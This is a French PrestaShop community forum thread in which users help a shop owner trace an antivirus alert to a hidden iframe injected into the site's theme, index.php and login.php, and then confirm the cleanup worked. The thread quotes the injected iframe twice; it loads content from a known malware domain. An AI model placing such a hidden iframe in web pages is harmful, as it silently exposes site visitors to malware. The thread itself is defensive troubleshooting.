Procédure de sécurité à lire attentivement

[jdo-cecile]

j'ai regardé tous les scripts, j'ai pas trouvé de bout de code bizarre

de plus, quand j'ai voulu importé ma partie admin en locale, j'ai mon antivirus qui s'est déclenché pour le meme cheval de troie

Si quelqu'un pouvait me donner un coup de main, ce serait super !!!

[Carl Favre]

Sur quels fichiers as-tu eu l'alerte ?

 

Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire :

 

<iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

[coeos.pro]

bien vu, une iframe avec visibility:hidden : suspect en vue !

 

Avec chrome j'ai une page d'avertissement qui m'empèche d'aller sur le site avec comme message : www.ronde-des-bijoux.com fournit du contenu provenant de novikkoll.in, un site connu pour distribuer des logiciels malveillants. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site.

[jdo-cecile]

ok je verifie ca tout de suite Merci

[coeos.pro]

Sur quels fichiers as-tu eu l'alerte ?

 

Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire :

 

<iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

 

 

Ceci provient certainement d'un module "vérolé", il faudrait avoir la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions

[jdo-cecile]

sur un fichier comme admin*/index.php, admin/login.php et index.php a la racine du site

[jdo-cecile]

je viens de m'appercevoir que j'ai cet iframe meme dans la partie admin ! je n'arrive pas a le trouver.

[coeos.pro]

1- il nous faut la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions

2- sinon c'est dans le thème : par exemple le fichier www.ronde-des-bijoux.com/themes/LE_NOM_DE_TON_THEME/header.tpl

[jdo-cecile]

dans mon "top of pages" il y a :

- bloc informations client

- pages introuvables

- mots clés

et dans mon "header of pages" :

- url canonique

- bloc recherche rapide

- atos

j'ai déja vérifié ces modules et je n'ai rien trouvé. Je refais un tour du coté des *.js

[jdo-cecile]

Je pense que j'ai trouvé c'etait dans mes index.php et login.php, j'ai renvoye un code source qui etait propre et je ne vois plus apparaitre le fameux iframe.

 

Est ce que quelqu'un peu vérifier SVP, en tout cas merci d'avance pour l'aide que vous m'avez apporté et les idées de recherches.

[Carl Favre]

Ça me semble bon, plus d'alerte dans Chrome ni IE.

[coeos.pro]

c'est bon je n'ai plus le message d'avertissement, j'ai fait différentes page (accueil, catégorie, produit, connexion)

[jdo-cecile]

ouf, quelle saleté ce truc, surtout que début d'année j'ai eu un autre cheval de troie sur mon pc qui est dead depuis; une grosse vérole et perdu un bon paquet de truc !!!

[Amazonya]

Ou trouve ton ce patch, car il n'est plus disponible, je tombe sur une page 404 ??

[Johann]

j'avais conservé le herfix ici :

www.johanncorbel.fr/download/prestashop/versions/herfix.zip

[Amazonya]

Merci Johann, mais comment identifier si la modif a déja été validée ? ( reprise d'une boutique.

[Amazonya]

Un détournement d’un script de mise à jour d’actualité on ne sait pas ou et un correctif indisponible sur le site Prestashop

bravo l'équipe heureusement que quelques actifs sympas sont la

[amerigeau]

Bonjour à tous,

Pour aider le maximum de marchands sous PrestaShop, voici un article compilant le maximum de données sur le sujet "comment sécuriser une boutique PrestaShop" et "comment réparer une boutique PrestaShop piratée" : https://www.arnaud-merigeau.fr/comment-securiser-votre-boutique-prestashop/

Bonne lecture ;)